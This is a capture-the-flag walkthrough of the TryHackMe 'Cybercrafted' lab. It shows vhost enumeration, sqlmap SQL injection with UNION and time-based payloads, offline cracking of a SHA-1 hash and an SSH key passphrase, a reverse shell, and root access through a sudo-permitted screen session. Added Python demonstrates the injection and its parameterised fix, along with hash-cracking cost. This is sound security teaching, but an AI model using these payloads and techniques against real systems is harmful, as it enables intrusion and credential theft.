TryHackMe >> Cybercrafted

DESCRIPTION

You have found an IP address of an in-development Minecraft server. Can you root it?

ENUM >> NMAP

Nmap scan report for cybercrafted.thm (10.10.142.63)
Host is up (0.33s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:36:ce:b9:ac:72:8a:d7:a6:b7:8e:45:d0:ce:3c:00 (RSA)
|   256 e9:e7:33:8a:77:28:2c:d4:8c:6d:8a:2c:e7:88:95:30 (ECDSA)
|_  256 76:a2:b1:cf:1b:3d:ce:6c:60:f5:63:24:3e:ef:70:d8 (ED25519)
80/tcp    open  http      Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Cybercrafted
|_http-favicon: Unknown favicon MD5: 4E1E2DCB46BCB45E53566634707765D9
|_http-server-header: Apache/2.4.29 (Ubuntu)
25565/tcp open  minecraft Minecraft 1.7.2 (Protocol: 127, Message: ck00r lcCyberCraftedr ck00rrck00r e-TryHackMe-r  ck00r, Users: 0/1)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 13:04:30 2022 -- 1 IP address (1 host up) scanned in 2216.07 seconds
</body> <!-- A Note to the developers: Just finished up adding other subdomains, now you can work on them! --> </html>
  • That sounds like an invitation for a vhost scan… 😉

ENUM >> GoBuster subdomain (vhost) scan

Found: store.cybercrafted.thm (Status: 403) [Size: 287]
Found: admin.cybercrafted.thm (Status: 200) [Size: 937]

NOTE: GoBuster’s vhost scan will unfortunately print a line for every vhost it tries from the wordlist, and unlike the dir scans you cannot set a list of status codes to return (or ignore). However, failed hits come back with 404 status codes. A friendly piece of advice: don’t simply grep the list for "Status: 200" to get all positives; I nearly missed store. because it was a 403. Instead, grep -v "Status: 404" will work a lot better to give you a positive result list.
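To make the point in the NOTE concrete, here is an added example (my own code, not from the write-up) that parses GoBuster vhost output and compares the naive "only 200s" filter with the "drop the 404s" filter. The sample output lines are constructed: the real scan only showed the two positives, so the 404 hosts (www., dev., mail.) and the sizes on those lines are made up. It also goes one step beyond the NOTE with a status-independent filter that drops whatever response size the wildcard vhost answer has, which catches a 403 or a 301 just as well as a 200.

```python
import re
from collections import Counter

# Constructed sample of GoBuster v3.1 "vhost" output. The real scan on this
# page only showed the two positives; the 404 lines here are made up to mimic
# the noise every wordlist entry produces.
SAMPLE_VHOST_OUTPUT = """\
Found: www.cybercrafted.thm (Status: 404) [Size: 281]
Found: store.cybercrafted.thm (Status: 403) [Size: 287]
Found: dev.cybercrafted.thm (Status: 404) [Size: 281]
Found: admin.cybercrafted.thm (Status: 200) [Size: 937]
Found: mail.cybercrafted.thm (Status: 404) [Size: 281]
"""

# One "Found:" line -> host, HTTP status, response size
LINE_RE = re.compile(r"^Found:\s+(\S+)\s+\(Status:\s+(\d+)\)\s+\[Size:\s+(\d+)\]")


def parse_vhost_output(text):
    """Turn every Found: line into a (host, status, size) tuple, in scan order."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            hits.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return hits


def only_200(text):
    """The naive filter (grep 'Status: 200'): silently drops the 403 on store."""
    return [h for h in parse_vhost_output(text) if h[1] == 200]


def not_404(text):
    """The filter the NOTE recommends (grep -v 'Status: 404'): keep every non-miss."""
    return [h for h in parse_vhost_output(text) if h[1] != 404]


def drop_wildcard_size(text):
    """Status-independent variant: the default (wildcard) vhost answer is the
    same page every time, so its size is the most common one; keep the outliers."""
    hits = parse_vhost_output(text)
    if not hits:
        return []
    wildcard_size, _ = Counter(h[2] for h in hits).most_common(1)[0]
    return [h for h in hits if h[2] != wildcard_size]


if __name__ == "__main__":
    print("grep 'Status: 200' equivalent  :", [h[0] for h in only_200(SAMPLE_VHOST_OUTPUT)])
    print("grep -v 'Status: 404' equivalent:", [h[0] for h in not_404(SAMPLE_VHOST_OUTPUT)])
    print("drop wildcard-size responses   :", [h[0] for h in drop_wildcard_size(SAMPLE_VHOST_OUTPUT)])
```

The size-based filter is the one to reach for when a target answers unknown vhosts with something other than 404 (a 200 landing page or a 301 redirect), because then grep -v on the status code keeps everything.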

ENUM >> GoBuster dir scan on store.cybercrafted.thm

❯ gobuster dir -u http://store.cybercrafted.thm -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -x php  -t 20
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://store.cybercrafted.thm
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/02/12 15:29:30 Starting gobuster in directory enumeration mode
===============================================================
/search.php           (Status: 200) [Size: 838]
/assets               (Status: 301) [Size: 333] [--> http://store.cybercrafted.thm/assets/]

ENUM >> SQLMap on store.cybercrafted.thm / search.php

  • OK, so poking around the new website on http://store.cybercrafted.thm I found a search page that could be SQL injectable:
❯ sqlmap -u http://store.cybercrafted.thm/search.php --forms --crawl=2 --batch --dump webapp
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.12#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[*] starting @ 15:39:49 /2022-02-12/

[15:39:49] [INFO] starting crawler for target URL 'http://store.cybercrafted.thm/search.php'
[15:39:49] [INFO] searching for links with depth 1
[15:39:50] [INFO] searching for links with depth 2
[1/1] Form:
POST http://store.cybercrafted.thm/search.php
POST data: search=&submit=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: search=&submit=] (Warning: blank fields detected): search=&submit=
[15:39:51] [INFO] resuming back-end DBMS 'mysql'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=JtBW' AND (SELECT 9659 FROM (SELECT(SLEEP(5)))dPlw) AND 'aFHR'='aFHR&submit=

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: search=JtBW' UNION ALL SELECT NULL,CONCAT(0x71706a7671,0x4c564c4b42736f6b656c70474170766558515a48614c5951454c4543436176577a686976497a5a44,0x7176706a71),NULL,NULL-- -&submit=
---
[15:39:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[15:39:51] [INFO] fetching tables for database: 'webapp'
[15:39:51] [INFO] fetching columns for table 'admin' in database 'webapp'
[15:39:52] [INFO] fetching entries for table 'admin' in database 'webapp'
[15:39:52] [INFO] recognized possible password hashes in column 'hash'
Database: webapp
Table: admin
[2 entries]
+----+------------------------------------------+---------------------+
| id | hash                                     | user                |
+----+------------------------------------------+---------------------+
| 1  | <REDACTED> | xXUltimateCreeperXx |
| 4  | <REDACTED> | web_flag            |
+----+------------------------------------------+---------------------+


  • Win win, a flag and a password hash! 😉
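What sqlmap found above is a classic string-concatenated search query: the "Generic UNION query (NULL) - 4 columns" payload closes the quoted search term, appends a four-column UNION that pulls from the admin table, and comments out the rest. The following added example (my own code, not the store's real search.php) reproduces that shape against an in-memory SQLite stand-in for the MySQL back end, with a constructed products table and constructed admin hashes, and puts the vulnerable query next to the parameterised fix. SQLite has no CONCAT, so the payload uses || where sqlmap's MySQL payload used CONCAT/hex literals.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the store DB: a 4-column products table (so a
    4-column UNION lines up, as in sqlmap's finding) and an admin table with
    fake hashes. Not the real schema from the box."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT, stock INTEGER);
        INSERT INTO products VALUES (1, 'Diamond Sword', '500', 3);
        INSERT INTO products VALUES (2, 'Creeper Plush', '20', 12);
        CREATE TABLE admin(id INTEGER, hash TEXT, user TEXT);
        INSERT INTO admin VALUES (1, 'deadbeef-constructed-hash', 'xXUltimateCreeperXx');
        INSERT INTO admin VALUES (4, 'cafebabe-constructed-hash', 'web_flag');
    """)
    return db


def search_vulnerable(db, term):
    """What a search.php that glues user input into the SQL string looks like."""
    sql = "SELECT id, name, price, stock FROM products WHERE name LIKE '%" + term + "%'"
    return db.execute(sql).fetchall()


def search_safe(db, term):
    """Same query with a bound parameter: the input is data, never SQL."""
    sql = "SELECT id, name, price, stock FROM products WHERE name LIKE ?"
    return db.execute(sql, ("%" + term + "%",)).fetchall()


# Same shape as sqlmap's 4-column UNION payload: close the string, UNION ALL in
# four columns with the interesting data in column 2, comment out the tail.
UNION_PAYLOAD = "x' UNION ALL SELECT NULL, user || ':' || hash, NULL, NULL FROM admin-- -"


def leaked_rows(rows):
    """Pull the 'user:hash' strings smuggled into column 2 out of a result set."""
    return sorted(r[1] for r in rows if r[1] is not None and ":" in r[1])


if __name__ == "__main__":
    db = build_db()
    print("normal search      :", search_safe(db, "Diamond"))
    print("vulnerable + UNION :", leaked_rows(search_vulnerable(db, UNION_PAYLOAD)))
    print("parameterised      :", search_safe(db, UNION_PAYLOAD))
```

With the bound parameter the whole payload is matched literally against product names and returns nothing; the concatenated version hands back the admin table through the search results, which is exactly what the --dump above did.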

ENUM >> HashCat xXUltimateCreeperXx’s password

❯ hashcat -m 100 admin_pass.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, 5121/5185 MB (2048 MB allocatable), 4MCU

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

<REDACTED>:diamond123456789

Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: 88b949dd5cdfbecb9f2ecbbfa24e5974234e7c01
Time.Started.....: Sat Feb 12 15:54:39 2022 (3 secs)
Time.Estimated...: Sat Feb 12 15:54:42 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2553.1 kH/s (0.61ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8638464/14344385 (60.22%)
Rejected.........: 0/8638464 (0.00%)
Restore.Point....: 8634368/14344385 (60.19%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: diancarol -> diamada

Started: Sat Feb 12 15:54:15 2022
Stopped: Sat Feb 12 15:54:44 2022
  • Boom! We got creds! Let’s use them to log in to the http://admin.cybercrafted.thm site:

PRIVESC >> Reverse Shell…

  • The screenshot kind of says it all, just a simple bash reverse shell in the command box:

  • … and there is our shell access! 😉
❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.9.0.248] from (UNKNOWN) [10.10.151.36] 43298
bash: cannot set terminal process group (1095): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cybercrafted:/var/www/admin$

ENUM >> cracking xxultimatecreeperxx’s passphrase-protected ssh key

  • OK, finding xxultimatecreeperxx’s ssh key is great and all, but it is protected with a passphrase… let’s feed it to john! First we need to convert it to a format john can crack using ssh2john.py, then we can throw the resulting hash at john to do all the heavy lifting:
❯ python2.7 /usr/share/john/ssh2john.py xxultimatecreeperxx > xxultimatecreeperxx.hash

❯ john --wordlist=/usr/share/wordlists/rockyou.txt xxultimatecreeperxx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED>      (?)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:43 DONE (2022-02-12 16:13) 0.02310g/s 331370p/s 331370c/s 331370C/sa6_123..*7¡Vamos!
Session completed
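Both cracks above (the hashcat run and the john run) finished in seconds for the same reason: the hash costs almost nothing per guess. hashcat -m 100 is a single unsalted SHA-1, and john's own "Cost 1 (KDF/cipher …) is 0" line says the key file uses the legacy MD5/AES key derivation rather than the bcrypt KDF of the newer OpenSSH format. The added example below (my own code, not from the write-up) shows what a dictionary attack against unsalted SHA-1 looks like and how much more each guess costs once a salted, iterated hash (PBKDF2-HMAC-SHA256 here, as a stand-in for any proper password KDF) is used. The wordlist and salt are constructed; the real hash from the page is not reproduced.

```python
import hashlib
import time

# Constructed mini wordlist standing in for rockyou.txt (14,344,385 entries in
# the real file); the last three entries echo the candidate names in the
# hashcat status lines above.
WORDLIST = ["password", "minecraft", "creeper", "diancarol", "diamond123456789", "diamada"]

# Constructed salt for the slow-hash variant; a real system stores one random
# salt per user next to the hash.
SALT = b"constructed-16B-salt"

SLOW_ITERATIONS = 50_000


def sha1_hex(password):
    """hashcat -m 100: one unsalted SHA-1 over the raw password, nothing else."""
    return hashlib.sha1(password.encode()).hexdigest()


def crack_sha1(target_hex, wordlist):
    """Dictionary attack the way hashcat did it: hash each guess, compare."""
    for guess in wordlist:
        if sha1_hex(guess) == target_hex:
            return guess
    return None


def pbkdf2_hex(password, salt=SALT, iterations=SLOW_ITERATIONS):
    """A salted, iterated hash (PBKDF2-HMAC-SHA256): the salt defeats shared
    tables, and every guess costs `iterations` HMAC rounds instead of one."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def crack_pbkdf2(target_hex, wordlist, salt=SALT, iterations=SLOW_ITERATIONS):
    """Same dictionary attack, now paying the full KDF cost on every guess."""
    for guess in wordlist:
        if pbkdf2_hex(guess, salt, iterations) == target_hex:
            return guess
    return None


def cost_ratio(guesses=20, iterations=SLOW_ITERATIONS):
    """How many times longer one PBKDF2 guess takes than one raw SHA-1 guess."""
    t0 = time.perf_counter()
    for _ in range(guesses):
        sha1_hex("diamond123456789")
    fast = time.perf_counter() - t0
    t0 = time.perf_counter()
    for _ in range(guesses):
        pbkdf2_hex("diamond123456789", iterations=iterations)
    slow = time.perf_counter() - t0
    return slow / max(fast, 1e-9)


if __name__ == "__main__":
    target = sha1_hex("diamond123456789")   # stand-in for the dumped hash
    print("SHA-1 cracked   :", crack_sha1(target, WORDLIST))
    print("PBKDF2 cracked  :", crack_pbkdf2(pbkdf2_hex("creeper"), WORDLIST))
    print("cost per guess  : PBKDF2 is ~%.0fx SHA-1" % cost_ratio())
```

The slow hash still falls to a guessable password (creeper is in the list), which is why the iteration count is a multiplier on attack cost rather than a fix for weak passwords; what it buys the defender is turning hashcat's 2.5 MH/s into something closer to tens of guesses per second per core. The same logic applies to the ssh key: re-encrypting it with ssh-keygen -o (the bcrypt-KDF format) would have made john's run a lot longer than 43 seconds.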
  • Now to test our freshly cracked ssh key:
❯ ssh -i xxultimatecreeperxx xxultimatecreeperxx@cybercrafted.thm
Enter passphrase for key 'xxultimatecreeperxx':
xxultimatecreeperxx@cybercrafted:~$

LOOT >> Minecraft server flag

xxultimatecreeperxx@cybercrafted:/opt/minecraft$ cat minecraft_server_flag.txt
<REDACTED>

ENUM >> dodgy "LoginSystem" plugin…

  • OK there is a super-sus looking plugin installed on this server named LoginSystem – it consists of 4 files:
xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$ ls
language.yml  log.txt  passwords.yml  settings.yml
  • I bet that log.txt has something juicy…

LOOT >> log.txt from LoginSystem leaks passwords!!!

[2021/06/27 11:25:07] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:25:16] cybercrafted registered. PW: <REDACTED>
[2021/06/27 11:58:52] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:59:01] madrinch logged in. PW: Password123
  • cybercrafted’s Minecraft creds! (madrinch doesn’t have an account on this system)… but surely they wouldn’t be so outright stupid as to use that as their ssh password too?

PRIVESC >> su cybercrafted

  • … I guess they are that stupid.
xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$ su cybercrafted
Password: 
cybercrafted@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$

LOOT >> user.txt

cybercrafted@cybercrafted:~$ cat user.txt
<REDACTED>

PRIVESC >> access to server running on root via screen

  • OK, we have moved up the user chain to the account that runs the Minecraft server, and more importantly we have their password… what can they do with sudo?
cybercrafted@cybercrafted:~$ sudo -l
[sudo] password for cybercrafted:
Matching Defaults entries for cybercrafted on cybercrafted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cybercrafted may run the following commands on cybercrafted:
    (root) /usr/bin/screen -r cybercrafted
cybercrafted@cybercrafted:~$ sudo /usr/bin/screen -r cybercrafted
  • MMMM SCREEN! Connecting to this drops us on the console of the Minecraft server… I did play with log4j (because why not! it was how the log4j exploit was discovered!) but didn’t get far… Oh well, simply hitting ctrl-a c drops us to a shell anyway:
# whoami
root
# cd /root
# cat root.txt
<REDACTED>